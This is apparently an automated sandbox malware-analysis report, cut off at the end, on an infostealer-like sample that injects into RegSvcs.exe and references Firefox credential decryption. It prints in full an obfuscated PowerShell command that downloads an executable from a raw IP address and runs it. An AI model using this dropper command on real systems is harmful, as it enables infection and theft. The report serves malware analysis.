                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\csso.exeAPI/Special instruction interceptor: Address: A72514
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 6823Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7738Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csso.exeAPI coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 7340Thread sleep count: 6823 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep count: 7738 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488Thread sleep count: 1890 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0008445A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C6D1 FindFirstFileW,FindClose,6_2_0008C6D1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0008C75C
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008EF95
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_0008F0F2
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008F3F3
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_000837EF
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00083B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00083B12
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0008BCBC
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_000249A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1404410976.0000000007E17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1404410976.0000000007E61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1402683143.0000000006E49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: powershell.exe, 00000003.00000002.1404410976.0000000007E82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: RegSvcs.exe, 00000007.00000002.2525931036.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\csso.exeAPI call chain: ExitProcess graph end nodegraph_6-101102
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0245C168
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00093F09 BlockInput,6_2_00093F09
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00023B3A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00055A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00055A7C
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00024B37 LoadLibraryA,GetProcAddress,6_2_00024B37
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00A71180 mov eax, dword ptr fs:[00000030h]6_2_00A71180
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00A72780 mov eax, dword ptr fs:[00000030h]6_2_00A72780
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00A727E0 mov eax, dword ptr fs:[00000030h]6_2_00A727E0
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_000780A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004A124 SetUnhandledExceptionFilter,6_2_0004A124
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0004A155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_7452.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\csso.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\csso.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 577008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000787B1 LogonUserW,6_2_000787B1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00023B3A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_000248D7
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00084C27 mouse_event,6_2_00084C27
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZ